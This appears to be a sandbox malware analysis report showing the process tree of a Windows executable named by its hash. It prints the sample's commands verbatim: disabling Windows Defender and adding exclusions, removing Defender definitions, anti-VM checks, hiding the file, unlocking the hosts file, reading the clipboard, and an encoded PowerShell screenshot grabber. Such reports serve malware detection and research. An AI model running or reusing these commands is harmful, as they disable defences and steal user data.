PID 2432 wrote to memory of 2988	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	100
PID 2432 wrote to memory of 2988	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	100
PID 2432 wrote to memory of 2988	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	100
PID 2988 wrote to memory of 1216	2988	cmd.exe	102
PID 2988 wrote to memory of 1216	2988	cmd.exe	102
PID 2988 wrote to memory of 1216	2988	cmd.exe	102
PID 2432 wrote to memory of 1880	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	103
PID 2432 wrote to memory of 1880	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	103
PID 2432 wrote to memory of 1880	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	103
PID 1880 wrote to memory of 2132	1880	cmd.exe	105
PID 1880 wrote to memory of 2132	1880	cmd.exe	105
PID 1880 wrote to memory of 2132	1880	cmd.exe	105
PID 2432 wrote to memory of 2560	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	140
PID 2432 wrote to memory of 2560	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	140
PID 2432 wrote to memory of 2560	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	140
PID 2560 wrote to memory of 1460	2560	cmd.exe	153
PID 2560 wrote to memory of 1460	2560	cmd.exe	153
PID 2560 wrote to memory of 1460	2560	cmd.exe	153
PID 2432 wrote to memory of 4324	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	109
PID 2432 wrote to memory of 4324	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	109
PID 2432 wrote to memory of 4324	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	109
PID 4324 wrote to memory of 1552	4324	cmd.exe	111
PID 4324 wrote to memory of 1552	4324	cmd.exe	111
PID 4324 wrote to memory of 1552	4324	cmd.exe	111
PID 2432 wrote to memory of 3304	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	112
PID 2432 wrote to memory of 3304	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	112
PID 2432 wrote to memory of 3304	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	112
PID 2432 wrote to memory of 4356	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	113
PID 2432 wrote to memory of 4356	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	113
PID 2432 wrote to memory of 4356	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	113
PID 2432 wrote to memory of 4940	2432	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	116

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2864	attrib.exe
3684	attrib.exe
2752	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
"C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
  "C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4192
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1120
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1820
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1880
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:3304
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4356
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4940
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4960
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3192
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      PID:5068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:764
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1700
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:972
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3412
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      System Location Discovery: System Language Discovery
      PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2792
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2984
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qi1k5sly\qi1k5sly.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3504
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5B3.tmp" "c:\Users\Admin\AppData\Local\Temp\qi1k5sly\CSCE751BD7973164E56AB5EAA5FFF4A75B.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:876
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3580
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1460
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4040
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1700
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2204
